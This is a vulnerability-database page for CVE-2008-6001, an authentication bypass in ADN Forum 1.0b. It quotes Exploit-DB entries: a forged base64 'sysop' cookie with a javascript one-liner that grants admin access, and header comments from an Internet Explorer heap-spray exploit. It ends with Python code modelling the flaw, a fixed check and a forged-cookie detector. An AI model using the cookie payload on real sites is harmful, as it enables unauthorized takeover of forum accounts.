CVE-2008-6001
Published 2009-01-28
Priority P3 53 | high | 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.45% (82.4th percentile)
index.php in ADN Forum 1.0b and earlier allows remote attackers to bypass authentication and gain sysop access via a fpusuario cookie composed of an initial sysop: string, an arbitrary password field, and a final :sysop:0 string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adnforum | adnforum | <= 1.0b | — |
No detection rules found.
Exploit-DB
Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow
exploitdb·2008-12-10
CVE-2008-4844 Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow
---
// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
Exploit-DB
ADN Forum 1.0b - Insecure Cookie Handling
exploitdb·2008-09-24
CVE-2008-6001 ADN Forum 1.0b - Insecure Cookie Handling
---
adnforum
eNYe-Sec - www.enye-sec.org
Cookie is base64 based and the ascii format used is:
user:23ed4e45887ad4311ff654bd4aab6540:user:0
user:md5 pass:user:0
Programmer forgot to check the pass and only uses the nick to authenticate
the user.
You can create a fake cookie like this:
sysop:000000000000000000000000000000:sysop:0
In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA
Exploit:
javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"
# milw0rm.com [2008-09-24]
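The check the advisory says is missing, modelled in Python as an added example (not ADN Forum's code, which is PHP, and not from the advisory's authors). The account store, function names and password are constructed assumptions; only the cookie name, its `nick:md5:nick:0` layout and the sample value come from the advisory.

```python
import base64, hashlib, hmac, re

# Constructed account store for this example: nick -> MD5 hex of the password.
USERS = {"sysop": hashlib.md5(b"constructed-password").hexdigest()}
MD5_HEX = re.compile(r"[0-9a-f]{32}")
# fpusuario value quoted in the advisory above.
ADVISORY_SAMPLE = "c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"

def parse_fpusuario(value):
    """Decode the cookie into (nick, pass_hash, nick2, flag), or None if malformed."""
    try:
        padded = value + "=" * (-len(value) % 4)  # the advisory's sample has no padding
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    parts = text.split(":")
    return tuple(parts) if len(parts) == 4 else None

def login_nick_only(value):
    """Models the flaw: the nick is looked up, the hash field is never compared."""
    fields = parse_fpusuario(value)
    if fields and fields[0] in USERS:
        return fields[0]
    return None

def login_checked(value):
    """Requires a well-formed hash field that matches the stored hash."""
    fields = parse_fpusuario(value)
    if not fields:
        return None
    nick, pass_hash, nick2, _flag = fields
    stored = USERS.get(nick)
    if stored is None or nick != nick2 or not MD5_HEX.fullmatch(pass_hash):
        return None
    # Constant-time comparison of the presented and stored hashes.
    return nick if hmac.compare_digest(pass_hash, stored) else None

def is_forged(value):
    """Flag logged cookie values that name a real account but fail the hash check."""
    return login_nick_only(value) is not None and login_checked(value) is None

if __name__ == "__main__":
    print("advisory sample flagged:", is_forged(ADVISORY_SAMPLE))
```

`is_forged` can be run over `fpusuario` values pulled from request logs. Comparing the hash only restores the intended check; a cookie that carries the password hash still works as a credential for anyone who obtains it.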
No writeups or analysis indexed.
http://secunia.com/advisories/18300
http://www.securityfocus.com/bid/31383
https://exchange.xforce.ibmcloud.com/vulnerabilities/45400
https://www.exploit-db.com/exploits/6557
2009-01-28
Published